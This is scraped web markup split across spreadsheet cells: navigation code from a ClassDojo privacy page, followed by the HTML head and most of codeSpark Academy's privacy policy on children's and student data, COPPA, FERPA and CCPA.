9prca4"&gt;.css-9prca4{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-flex-wrap:wrap;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap;}&lt;/style&gt;&lt;div class="css-9prca4 e3xwyfj1"&gt;&lt;style data-emotion="css 18qi1le"&gt;.css-18qi1le{z-index:5;position:-webkit-sticky;position:sticky;top:0;display:block;height:52px;overflow:hidden;visibility:visible;width:100%;padding-right:30px;border-bottom:1px solid #eee;background-color:#fff;}.css-18qi1le hr{margin-top:0;}@media screen and (min-width:992px){.css-18qi1le{padding-right:0;height:-webkit-max-content;height:-moz-max-content;height:max-content;top:175px;width:25%;}}@media print{.css-18qi1le{display:none;}}&lt;/style&gt;&lt;nav class="css-18qi1le eyvagkw2"&gt;&lt;style data-emotion="css 14z5ec8"&gt;.css-14z5ec8{position:absolute;cursor:pointer;top:5px;right:10px;height:52px;border:none;margin:0;padding:0;width:auto;overflow:visible;background:transparent;color:inherit;font:inherit;line-height:normal;}@media screen and (min-width:992px){.css-14z5ec8{display:none;}}@media print{.css-14z5ec8{display:none;}}&lt;/style&gt;&lt;button aria-expanded="false" type="button" class="css-14z5ec8 eyvagkw0"&gt;&lt;svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 320 512" height="24px" width="24px" xmlns="http://www.w3.org/2000/svg"&gt;&lt;path d="M143 352.3L7 216.3c-9.4-9.4-9.4-24.6 0-33.9l22.6-22.6c9.4-9.4 24.6-9.4 33.9 0l96.4 96.4 96.4-96.4c9.4-9.4 24.6-9.4 33.9 0l22.6 22.6c9.4 9.4 9.4 24.6 0 33.9l-136 136c-9.2 9.4-24.4 9.4-33.8 0z"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;&lt;style data-emotion="css a8nej9"&gt;.css-a8nej9 a{-webkit-text-decoration:none;text-decoration:none;}.css-a8nej9 a:hover{-webkit-text-decoration:none;text-decoration:none;}.css-a8nej9 ul{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;max-height:calc(100vh - 175px);overflow-y:auto;margin-bottom:0;padding-left:0;list-style:none;}.css-a8nej9 ul&gt;li&gt;a{color:#333;margin:15px 0;padding:0</t>
  </si>
  <si>
    <t>10px 0 5px;line-height:1.42857143;font-size:20px;font-weight:700;text-align:left;display:block;}.css-a8nej9 ul&gt;li.active&gt;a{color:#00aeef;}.css-a8nej9 ul&gt;li .sub -menu{max-height:unset;}.css-a8nej9 ul&gt;li .sub-menu li{margin-bottom:10px;margin-left:15px;}.css-a8nej9 ul&gt;li .sub-menu a{font-size:14px;color:#000;font-weight:400;margin:0;}@media print{.css-a8nej9{display:none;}}&lt;/style&gt;&lt;div class="css-a8nej9 eyvagkw1"&gt;&lt;ul class="nav"&gt;&lt;li class="active"&gt;&lt;a href="/privacy"&gt;Privacy Policy&lt;/a&gt;&lt;ul class="sub-menu"&gt;
&lt;li&gt;&lt;a href="#overview"&gt;Overview&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#classdojos-privacy-certifications"&gt;ClassDojo’s Privacy Certifications&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#what-is-classdojo"&gt;What is ClassDojo?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>href="#how-does-classdojo-protect-childrens-personal-information"&gt;How Does Classdojo Protect Children’s Personal Information?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#what-information-does-classdojo-collect"&gt;What Information Does ClassDojo Collect?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#how-does-classdojo-use-the-information-it-collects"&gt;How Does Classdojo Use The Information It Collects?&lt;/a&gt;&lt;/li &gt;
&lt;li&gt;&lt;a href="#will-classdojo-share-any-information-it-collects"&gt;Will Classdojo Share Any Information</t>
  </si>
  <si>
    <t>It Collects?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#how-does-classdojo-protect-and-secure-my-information"&gt;How Does Classdojo Protect And Secure My Information?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#classdojos-commitments-to-providing-transparency-and-your-rights"&gt;Classdojo’s Commitments To Providing Transparency And Your Rights&lt;/a&gt;&lt;/li&gt;&lt;ul class='list-unstyled'&gt;
&lt;li&gt;&lt;a href="#access-or-correct-your-personal-information"&gt;Access Or Correct Your Personal Information&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#how-can-i-delete-my-account"&gt;How Can I Delete My Account?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#object-restrict-or-withdraw-consent"&gt;Object, Restrict, or Withdraw Consent&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#additional-information-or-assistance-and-article-27-gdpr-local-representative"&gt;Additional Information or Assistance and Article 27 GDPR Local Representative&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>href="#how-long-does-classdojo-keep-information-about-me"&gt;How Long Does Classdojo Keep Information About Me?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#what-communications-will-i-receive-from-classdojo"&gt;What Communications Will I Receive From Classdojo?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#third-party-authentication-services"&gt;Third-party Authentication Services&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#third-party-services"&gt;Third-Party Services&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#how-will-classdojo-notify-me-of-changes-to-this-policy"&gt;How Will Classdojo Notify Me Of Changes To This Policy?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#is-classdojo-a-controller"&gt;Is ClassDojo a Controller?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#what-if-im-not-in-the-us"&gt;What if I’m not in the U.S.?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#california-privacy-disclosures"&gt;California Privacy Disclosures&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>href="#how-can-i-contact-classdojo-with-questions"&gt;How Can I Contact Classdojo With Questions?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#further-privacy-and-security-resources"&gt;Further Privacy and Security Resources&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;&lt;li class=""&gt;&lt;a href="/security"&gt;Security&lt;/a&gt;&lt;/li&gt;&lt;li class=""&gt;&lt;a href="/website-privacy"&gt;Website Privacy Policy&lt;/a&gt;&lt;/li&gt;&lt;li class=""&gt;&lt;a href="/terms"&gt;Terms of Service&lt;/a&gt;&lt;/li&gt;&lt;li class=""&gt;&lt;a href="/transparency/"&gt;Information Transparency&lt;/a&gt;&lt;/li&gt;&lt;li class=""&gt;&lt;a href="/cookies-policy"&gt;Cookies Policy&lt;/a&gt;&lt;/li&gt;&lt;li class=""&gt;&lt;a href="/securitydisclosureprogram"&gt;Security Vulnerability Disclosure Program&lt;/a&gt;&lt;/li&gt;&lt;li class=""&gt;&lt;a href="/premium-features-terms"&gt;Premium Features Terms&lt;/a&gt;&lt;/li&gt;&lt;li class=""&gt;&lt;a href="/third-party-service-providers"&gt;Third Party Service Providers&lt;/a&gt;&lt;/li&gt;&lt;li class=""&gt;&lt;a href="/child-privacy"&gt;Child Privacy Terms&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/nav&gt;&lt;style data-emotion="css 1y5xm25"&gt;.css-1y5xm25{box-sizing:border-box;min-width:0;padding-left:0;width:100%;}@media screen and (min-width: 768px){.css-1y5xm25{padding-left:0;}}@media screen and (min-width: 992px){.css-1y5xm25{padding-left:15px;}}@media screen and (min-width: 768px){.css-1y5xm25{width:100%;}}@media screen and (min-width: 992px){.css-1y5xm25{width</t>
  </si>
  <si>
    <t xml:space="preserve">
            &lt;html&gt;
                &lt;head&gt;
                    &lt;!-- The first thing in any HTML file should be the charset --&gt;
                    &lt;meta charset="utf-8"&gt;
                    &lt;!-- Make the page mobile compatible --&gt;
                    &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
                    &lt;!--</t>
  </si>
  <si>
    <t>Allow installing the app to the homescreen --&gt;
                     &lt;link rel="manifest" href="manifest.json"&gt;
                    &lt;link rel="canonical" href="https://codespark.com"&gt;
                    &lt;meta name="mobile-web-app-capable" content="yes"&gt;
                    &lt;meta name="theme-color" content="#c6eef9"&gt;
                    &lt;!-- Smart App Banner for iOS --&gt;
                    &lt;meta name="apple-itunes-app" content="app-id=923441570"&gt;
                    &lt;link rel="dns-prefetch" href="https://accounts.codespark.com"&gt;
                    &lt;link rel="dns-prefetch" href="https://thefoos-com2.s3.amazonaws.com/global/fonts"&gt;
                    &lt;title data-react-helmet="true"&gt;Privacy Policy | codeSpark</t>
  </si>
  <si>
    <t>Academy&lt;/title&gt;
                    &lt;meta data-react-helmet="true" name="keywords" content="Kids coding languages, Hour of code, coding for kids, kids apps, kids games, learn to code, STEM, Reading, Math, Elementary school"/&gt;&lt;meta data-react-helmet="true" property="og:title" content="Coding Game for Kids - Try it Free!"/&gt;&lt;meta data-react-helmet="true" property="og:description" content="Try the #1 learn-to-code app for kids ages 5-9. Used by over 20 million kids worldwide, kids learn coding basics with puzzles and build skills to make their own games. "/&gt;&lt;meta data-react-helmet="true" name="twitter:card" content="app"/&gt;&lt;meta data-react-helmet="true" name="twitter:site" content="@codesparkapp"/&gt;&lt;meta data-react-helmet="true" name="twitter:description" content="Try the #1 learn-to-code app for kids ages 5-9.</t>
  </si>
  <si>
    <t>Used by over 20 million kids worldwide, kids learn coding basics with puzzles and build skills to make their own games. "/&gt;&lt;meta data-react-helmet="true" name="twitter:app:country" content="US"/&gt;&lt;meta data-react-helmet="true" name="twitter:app:id:iphone" content="923441570"/&gt;&lt;meta data-react-helmet="true" name="twitter:app:id:ipad" content="923441570"/&gt;&lt;meta data-react-helmet="true" name="twitter:app:id:googleplay" content="org.codespark.thefoos"/&gt;
                    &lt;!-- Favicon
                    –––––––––––––––––––––––––––––––––––––––––––––––––– --&gt;
                    &lt;link rel="icon" href="https://dlnipn2r79d6o.cloudfront.net/global/favicon/favicon-512-32x32.png" sizes="32x32" /&gt;
                    &lt;link rel="icon" href="https://dlnipn2r79d6o.cloudfront.net/global/favicon/favicon-512-192x192.png" sizes="192x192" /&gt;
                    &lt;link rel="apple-touch-icon-precomposed" href="https://dlnipn2r79d6o.cloudfront.net/global/favicon/favicon-512-180x180.png" sizes="180x180" /&gt;
                    &lt;!--</t>
  </si>
  <si>
    <t>google optimize javascript api --&gt;
                    &lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-117136322-1"&gt;&lt;/script&gt;
                    &lt;script&gt;
                       window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t xml:space="preserve">[];
                      gtag = function () { dataLayer.push(arguments); }
                      gtag('js', new Date());
                      gtag('config', 'UA-117136322-1', { 'optimize_id': 'GTM-PRQQLRW'});
                    &lt;/script&gt;
                    &lt;link rel="stylesheet" type="text/css" href="/static/css/main.7835fc02.css"&gt;
                    &lt;!-- Twitter
                    –––––––––––––––––––––––––––––––––––––––––––––––––– --&gt;
                    &lt;script&gt;window.twttr = (function(d, s, id) {
                        var js, fjs = d.getElementsByTagName(s)[0],
                        t = window.twttr || {};
                        if (d.getElementById(id)) return t;
                        js = d.createElement(s);
                        </t>
  </si>
  <si>
    <t>js.id = id;
                        js.src = "https://platform.twitter.com/widgets.js";
                        fjs.parentNode.insertBefore(js, fjs);
                        t._e = [];
                        t.ready = function(f) {
                        t._e.push(f);
                        };
                        return t;
                    }(document, "script", "twitter-wjs"));&lt;/script&gt;
                    &lt;!-- Removed Facebook + GA pixel code 10.22.18 KR ticket #6694 --&gt;
                    &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Removed Hotjar and quantcast 12/06/18 KDR #6694 --&gt;
                    &lt;!-- Removed VWO 04/02/20 KH ticket #9727 --&gt;
                    &lt;script&gt;
                        </t>
  </si>
  <si>
    <t>redirectToIgnite = function(){
                            console.log(window.location)
                            if(window.location.href.indexOf("professional-development") &gt; -1){
                                var params = window.location.search;
                                var url = "https://teach.codespark.com/courses/codespark-ignite";
                                window.location.replace(url);
                            }
                        }
                        redirectToIgnite()
                    &lt;/script&gt;
                &lt;/head&gt;
                &lt;body&gt;
                    &lt;div id="root"&gt;&lt;div class="app-container"&gt;&lt;div class="header-wrapper"&gt;&lt;div class="
                        global-header-wrapper full-width main-header-wrapper
                        hasBanner
                        not-fixed"&gt;&lt;div class="header-top-banner marketing-banner bot-header-banner" style="background-color:#DECDFE;color:#21375B"&gt;&lt;div class="marketing-banner-desktop bot-banner-desktop"&gt;&lt;span class="marketing-banner-text bot-banner-text"&gt;Kids don&amp;#x27;t just play games, they can build them!&lt;/span&gt;&lt;span class="marketing-banner-cta bot-banner-cta"&gt;&lt;a href="https://accounts.codespark.com" style="color:#21375B"&gt;7-DAY FREE TRIAL&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="marketing-banner-mobile bot-banner-mobile"&gt;&lt;span class="marketing-banner-cta bot-banner-cta"&gt;&lt;a href="https://accounts.codespark.com" style="color:#21375B"&gt;Start Free 7-Day Trial&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="header-top-container"&gt;&lt;div class="header-navigation"&gt;&lt;div class="navigation-menu"&gt;&lt;button name="parents" class="header-link"&gt;Parents&lt;img class="dropdown-arrow" src="https://dlnipn2r79d6o.cloudfront.net/global/icons/single_arrow.svg" alt="dropdown arrow"/&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class="navigation-menu"&gt;&lt;button class="header-link"&gt;Educators&lt;img class="dropdown-arrow" src="https://dlnipn2r79d6o.cloudfront.net/global/icons/single_arrow.svg" alt="dropdown arrow"/&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class="navigation-menu"&gt;&lt;button class="header-link"&gt;About&lt;img class="dropdown-arrow" src="https://dlnipn2r79d6o.cloudfront.net/global/icons/single_arrow.svg" alt="dropdown arrow"/&gt;&lt;/button&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="logo"&gt;&lt;a href="/"&gt;&lt;img src="https://dlnipn2r79d6o.cloudfront.net/global/logo/codesparkAcademy.svg" alt="codeSpark Academy"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="login-link"&gt;&lt;a class="login-link-test" href="https://accounts.codespark.com/login"&gt;Login&lt;/a&gt;&lt;/div&gt;&lt;div class="cta-button"&gt;&lt;button data-event-category="button" data-event-action="main-menu" data-event-label="7 day FREE Trial" data-on="click"&gt;7 day FREE Trial&lt;img class="basic-arrow" src="https://dlnipn2r79d6o.cloudfront.net/global/icons/basic_arrow_white.svg" alt="arrow"/&gt;&lt;/button&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mobile-menu-wrapper"&gt;&lt;div class="grid-x grid-padding-x align-middle"&gt;&lt;div class="logo small-6"&gt;&lt;a href="/"&gt;&lt;img src="https://dlnipn2r79d6o.cloudfront.net/global/logo/codesparkAcademy.svg" alt="codeSpark Academy"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="hamburger-menu small-6"&gt;&lt;i class="fa fa-bars" aria-hidden="true"&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="privacy-page page"&gt;&lt;div class="page-header-wrapper"&gt;&lt;h1&gt;Privacy Policy&lt;/h1&gt;&lt;/div&gt;&lt;div class="grid-x grid-padding-x"&gt;&lt;div class="small-12 cell"&gt;&lt;p&gt;At codeSpark  (“codeSpark” “We” or “Us”) we care very much about your privacy.</t>
  </si>
  <si>
    <t>As creators of apps for children, we aim to follow the best practices as specified by the “Know what’s inside” program and the &lt;a href="https://www.kidsafeseal.com" target="_blank" rel="noopener noreferrer"&gt;&lt;u&gt;kidSAFE Seal Program&lt;/u&gt;&lt;/a&gt;, and comply with The Children’s Online Privacy Protection Act (COPPA).   To learn more about COPPA, please reference this simple one-page informational guide from the kidSAFE Seal Program: &lt;a href="https://www.kidsafeseal.com/knowaboutcoppa.html" target="_blank" rel="noopener noreferrer"&gt;www.kidsafeseal.com/knowaboutcoppa.html&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;We strive to be upfront, so there are no hidden surprises. This Privacy Policy describes the ways in which codeSpark.</t>
  </si>
  <si>
    <t>Inc. (collectively, “Company” or “We”) collects, uses and discloses information about users of the codeSpark websites (the “Site”), game applications (“Apps”) and online products and services that link to this policy (collectively, the “Services”). By using the Services you agree to the handling of your information in accordance with this Privacy Policy.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;i&gt;A few key points upfront:&lt;/i&gt;&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt; During registration we ask only for the barest minimum of information from an adult teacher or parent.</t>
  </si>
  <si>
    <t>From our children student users (under 13), the Services will never require full names or addresses; we ask only for a generic user name, which can be a nickname or a first name. &lt;/li&gt;&lt;li &gt;With respect to all student data, our practices are particularly strict, as we describe below.&lt;/li&gt;&lt;li&gt;</t>
  </si>
  <si>
    <t>Other than the fees for purchasing a subscription for the Services, where applicable, there are no in app purchases needed to play.&lt;/li&gt;&lt;li&gt; We are compliant with FERPA and COPPA&lt;/li&gt;&lt;li&gt;You have the right to request a copy to review and delete the information We have collected about you at any time.&lt;/li&gt;&lt;li&gt; The Services do not include any pop up ads or other third party advertisements.&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;WHAT KIND OF INFORMATION WE COLLECT&lt;/h3&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>In the course of providing our Services, We collect certain information. Some of the information is the information you voluntarily provide to us, like an email address. Other information We collect automatically as you use the Services, like your login in activities.</t>
  </si>
  <si>
    <t>We only collect your information in furtherance of our legitimate interest of providing you with the Services, and internally to evaluate our efforts to improve the Services, and we do not sell this information.&lt;/p&gt;&lt;p&gt;&lt;u&gt;Automatic Collection&lt;/u&gt;: Like most digital companies, we may use common technologies such as cookies and other technologies to better understand users’ interactions with the Services. These technologies help us keep track of user behavior, tell us which parts of our Services people have visited and are using, and facilitate and measure the effectiveness of activities. If you use any of our Services, we may also collect data related to the device on which the App is loaded.</t>
  </si>
  <si>
    <t>In particular, for analytics, we are using third party services of Mixpanel and Google Analytics. They store this data securely and do not share it with anyone else.   We are using a restricted version of their analytics product designed for use with apps for children, meaning that the anonymous data created from our Apps isn’t used anywhere else in their system, it’s only for us to improve the apps, including information on App crashes, usage time, games played and problems missed.&lt;/p&gt;&lt;p&gt;&lt;u&gt;Volunteered&lt;/u&gt;:</t>
  </si>
  <si>
    <t>In order for you to use the Services, a teacher or parent must create an account. This account safeguards the work you create on codeSpark, allows you access your work across multiple devices, and allows multiple related people to use the Services on the same device. When you (parents and teachers) create an account, register with us, send us an email, or provide other information with us in any other way, we will collect and store the information you share.</t>
  </si>
  <si>
    <t>You do not have to share this information with us, but without it, you may not be able to access certain features or participate in certain aspects of the Services.&lt;/p&gt;&lt;p&gt; The Services may enable you to input first names or nicknames for student and children players, which allow you to set up multiple profiles on a single device. The Apps will track each child’s play data separately to provide personalized activities and levels for each profile.</t>
  </si>
  <si>
    <t>Only parents or educators may sign up for a parent or school account by entering through a parental gate. When you sign up for a parent account, we collect and verify the parent’s email address so we can notify you about your child(ren)’s activities when using the Apps. With such an account, we provide to you additional services, such as multiple profiles, your child’s progress reports and additional resources.</t>
  </si>
  <si>
    <t>The Profile Names, zip code level location, along with birth month and year, will be collected in order to personalize your reports.&lt;/p&gt;&lt;p&gt;The Services will collect student play data thru persistent identifiers that are then linked to individual student nicknames or first names (not full names). This allows us to provide progress reports. Information collected from our Services is used for internal purposes to provide and improve the Services and for use and benefit of the students, schools, and parents only.</t>
  </si>
  <si>
    <t>We rely on teachers and schools to obtain parental consents if and when they are necessary.&lt;/p&gt;&lt;h3&gt;&lt;u&gt;Additional Protections and Information for School Accounts&lt;/u&gt;&lt;/h3&gt;&lt;p&gt;Educational Use; Student Data. We collect a bare minimum of personally identifiable information (Personal Information as defined below) from the parents and teachers as necessary for students to establish an account. For school accounts and school-based services, a school administrator or educator signs up for a school account, whereupon we collect the administrator’s or educator’s name, email address, school name and city.</t>
  </si>
  <si>
    <t>An educator sets up student nicknames or first names and accessibility options. Students are only identified by a nickname or first name and then associated with the teacher for their work through the Services (student first names and their work on the Services are collectively, “Student Data”).   The Services allow the students to create games and interact with the Services but only in a de-identified way.</t>
  </si>
  <si>
    <t>Students who use the story telling feature can submit pictures or text, so long as those features do not involve any Personal information, and those pictures and text features are not made publically accessible. With respect to student data in particular, We commit to protect student data additionally as follows&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Student data collected from our Services is evaluated and used only to provide the Services and for use and benefit of the students, schools, and parents only. ACCORDINGLY, CODESPARK WILL NOT, USE ANY STUDENT DATA IN ANY WAY OTHER THAN IN CONNECTION WITH THE PERFORMANCE OF THE SERVICES.&lt;/li&gt;&lt;li&gt;We commit to maintaining the confidentiality and security of all student data in accordance with all applicable state and U.S. federal regulations, including, without limitation, the Family Educational Rights and Privacy Act (“FERPA”).&lt;/li&gt;&lt;li&gt;CodeSpark will not sell or lease any student data for any advertising, marketing, or other purposes.&lt;/li&gt;&lt;li&gt;</t>
  </si>
  <si>
    <t>We will keep student data only as long as it continues to be part of our providing the Services and to maintain a record of our means to communicate with users. Once a teacher or school terminates its subscription or goes inactive, we will retain those records for not longer than 24 months from termination or inactivation.&lt;/li&gt;&lt;li&gt;We will delete, or if requested by the educational institution, transfer to the educational institution, all respective student data within 90 days) or a shorter time if required by applicable law) following termination of our agreement with the educational institution&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;u&gt;Third Party Analytics&lt;/u&gt;: This Site uses third party services to assist us with marketing to previous visitors to our Sites, including Google’s services which enable re-marketing on the Google search results pages or websites in Google’s networks.</t>
  </si>
  <si>
    <t>The Services use cookies or web beacons to serve ads based on someone’s prior web browsing history to then show ads and other reminders that you visited. The Services also collect information about your internet browsing, such as your ISP, the browser you used to visit our Sites and whether you have Flash installed. Any such data collected will be used in accordance with this privacy policy.</t>
  </si>
  <si>
    <t>Student Data is not shared with third parties for marketing or to serve ads to students.&lt;/p&gt;&lt;p&gt;&lt;u&gt;Publicly Posted&lt;/u&gt;: If you post information on public areas of the Site, which are intended for grown-ups only (i.e. comments or blog), that information is visible to and may be collected, stored and used by anyone. We recommend you be cautious about giving out Personal Information to others or sharing such information in public or online forums. We are not responsible for the actions of any third parties with whom you share any Personal Information.&lt;/p&gt;&lt;p&gt;&lt;u&gt;Credit Cards&lt;/u&gt;: You can become a subscriber by purchasing a subscription to the Services within the Apps, where allowed by the App marketplace partners.</t>
  </si>
  <si>
    <t xml:space="preserve">When You subscribe to our Services, the order process may request a credit card or other payment information (i.e. PayPal). Order information is done through the Sites or via iTunes and Android App Stores directly and we do not collect or process or store any of your Personal Information or credit card information during the billing process ourselves. We use a third party service provider to process payments made on our Sites.  </t>
  </si>
  <si>
    <t>Sales made via the app itself are processed through the marketplace partners directly (i.e. iTunes or Google Play), so your credit card information is not collected and retained by Us.&lt;/p&gt;&lt;h3&gt;HOW DO WE USE THE INFORMATION WE COLLECT?&lt;/h3&gt;&lt;p&gt; We collect and use your information to provide the Services, to provide support for the Services, to respond to user requests and inquiries, to provide you information about codeSpark and the Services and other information that may be of interest to you, to maintain a record of our dealings with users, to facilitate your use of and our administration and operation of the Services; and to evaluate how to improve our offerings.&lt;/p&gt;&lt;h3&gt;WHEN DO WE SHARE OR DISCLOSE YOUR INFORMATION&lt;/h3&gt;&lt;p&gt;Personal Information may be shared with a vendor who is helping us make the Services available and functional under contract and with safeguards. These include third-party vendors, technical agents, subcontractors, and our affiliates and consultants who assist us in performing functions to operate our Services.</t>
  </si>
  <si>
    <t>These functions include, for example, web site hosting, maintenance, data analysis, customer support, email delivery services, infrastructure services, customer service, technical agents, analytics and metrics services. These third parties will be restricted in the way they can use your Personal Information: they can only use our Information to provide services to Us in accordance with this Privacy Policy and they need to keep your information confidential and secure. We do not allow third parties to otherwise use any Student Data.&lt;/p&gt;&lt;p&gt;Personally identifiable information, or Personal Data as such term is defined by GDPR below (“Personal Information”), is information that can identify you or your child individually, such as an individual’s full name or physical mail address.</t>
  </si>
  <si>
    <t>Your Personal information may be shared as follows:&lt;/p&gt;&lt;p&gt;Personal Information may be shared with a vendor who is helping us make the Services available and functional under contract and with safeguards. These include third-party vendors, technical agents, subcontractors, and our affiliates and consultants who assist us in performing functions to operate our Services. These functions include, for example, web site hosting, maintenance, data analysis, customer support, email delivery services, infrastructure services, customer service, technical agents, analytics and metrics services.</t>
  </si>
  <si>
    <t>These third parties will be restricted in the way they can use your Personal Information and will need to keep your information confidential and secure and otherwise in accordance with this Privacy Policy.&lt;/p&gt;&lt;p&gt; We may also share Personal Information in a confidential and secure way during due diligence or in preparation for or after a sale, merger, consolidation, change in control, transfer of substantial assets, reorganization or liquidation. If codeSpark or its assets is purchased, all associated data and information will be transferred, provided the acquirer will be required to honor the terms of our then current privacy policy, as such may be updated from time to time.&lt;/p&gt;&lt;p&gt;If you give us permission, we may share the Personal Information of an adult account holder (teachers and parents) with third parties who might send you marketing and promotional information.&lt;/p&gt;&lt;p&gt;We may also disclose the Personal Information of an adult account holder (teachers and parents) if permitted or required by law or where we believe such action is necessary in order to protect or defend our interests or the interests of our users or business partners.&lt;/p&gt;&lt;h3&gt;CHILDREN’S PRIVACY&lt;/h3&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>This Site may be accessible to children but the Site is targeted for parents and adults and is not intended for children under age 13.   For the most part, when children use our Apps, we do not require any Personal Information from them, and we have taken steps so that information about a child/student requested from a parent/teacher is non-Personal Information such as a nickname or child’s first name and last initial only. We may give teachers the option to provide a parent’s email address for each student user so that we can inform parents of their child’s activities when using our Apps.&lt;/p&gt;&lt;p&gt;Collection of Personal Information that is directed to children under 13 (“Children’s Platforms”) is governed by the principles of the Children&amp;#x27;s Online Privacy Protection Act (“COPPA”), a U.S. law designed to protect the online privacy of children under the age of 13.</t>
  </si>
  <si>
    <t>We will obtain parental consent before collecting any Personal Information on our Services, unless the request for information falls within an exception that would be permitted under COPPA. We do not condition a child’s participation in our Services on the disclosure of more Personal Information than is reasonably necessary to participate in an activity.&lt;/p&gt;&lt;p&gt;The Services contain a story creation tool that allows kid coders to create personalized, interactive stories. The story creation tool enables kid coders to include recorded voices, upload photos, and type in speech bubbles to bring characters to life.</t>
  </si>
  <si>
    <t>Users can also share their interactive stories in the Kid Community space in our Services. The Kid Community is only available to users of our Services. In order to enable these stories to be shared in our Kid Community and across devices of a user’s account, we will store this content on our servers.</t>
  </si>
  <si>
    <t>These photos, voices and typed words that users provide may constitute Personal Information (for example, a child’s voice) and will be stored on our servers as part of making the tool available and functional in our Services.&lt;/p&gt;&lt;p&gt; Prior to making stories available in the Kid Community, story creations are submitted first to our moderator. A trained moderator will review content to avoid the posting of images, text or voices or other content that identifies a child or that reveals other personally identifying information (such as a complete home address) of student/child users.</t>
  </si>
  <si>
    <t>Our moderator will also review materials and remove other unacceptable content such as anything obscene, profane or harassing.   While we will make efforts to monitor the story creation content in our Services, we also recommend that you talk to your child about what you are comfortable with them sharing via photo, voice and typing on this space.   We ask that teachers and parents also monitor player usage for any unacceptable or personally identifiable information.&lt;/p&gt;&lt;p&gt;Parents and teachers may also at any time turn off the ability to utilize the uploading of photos, voice and words in story creation, by going into the parent portal settings.&lt;/p&gt;&lt;p&gt;Parents may contact us (at &lt;a href="mailto:privacy@codespark.com"&gt;privacy@codespark.com&lt;/a&gt;) to review, update or delete any of their children’s personal information that we may have collected and to elect for us not to collect any additional personal information from their children.&lt;/p&gt;&lt;h3 id="ccpa"&gt;THE CALIFORNIA CONSUMER PROTECTION ACT (CCPA)&lt;/h3&gt;&lt;p&gt;Under California law, California residents are entitled to ask us for a &lt;a href="https://thefoos-com2.s3.amazonaws.com/global/CCPA_Notice_2020.pdf"&gt;notice&lt;/a&gt; describing what categories of personal customer information we have shared with third parties or corporate affiliates for direct marketing purposes in the past 12 months.</t>
  </si>
  <si>
    <t>If you are a California resident and would like a copy of this notice, click &lt;a href="https://thefoos-com2.s3.amazonaws.com/global/CCPA_Notice_2020.pdf"&gt;here&lt;/a&gt;. Or if you prefer a copy mailed to you, please submit a written request to &lt;span class="italics"&gt;codeSpark, 130 W. Union Street, Pasadena, CA 91103&lt;/span&gt;.  In your request, please specify that you want a “California Privacy Notice.”</t>
  </si>
  <si>
    <t>We are not responsible for notices that are not labeled or are sent improperly. Please allow up to thirty days for this notice to be provided.&lt;/p&gt;&lt;p&gt;You can opt to exercise your rights under CCPA by going to &lt;a href="https://codespark.com/privacy-request-form"&gt;this form&lt;/a&gt; or by emailing us at &lt;a href="mailto:privacy@codespark.com"&gt;privacy@codespark.com&lt;/a&gt;.&lt;/p&gt;&lt;h3&gt;FOR NEVADA RESIDENTS&lt;/h3&gt;&lt;p&gt;We do not sell Personal Information, however, if you would like to exercise your right to opt out of any possible, future sales of your Personal Information, or request that we delete your Personal Information, please send this request to &lt;a href="mailto: privacy@codespark.com"&gt;privacy@codespark.com&lt;/a&gt;.&lt;/p&gt;&lt;h3&gt;EUROPEAN UNION, UK AND SWITZERLAND ADDITIONAL</t>
  </si>
  <si>
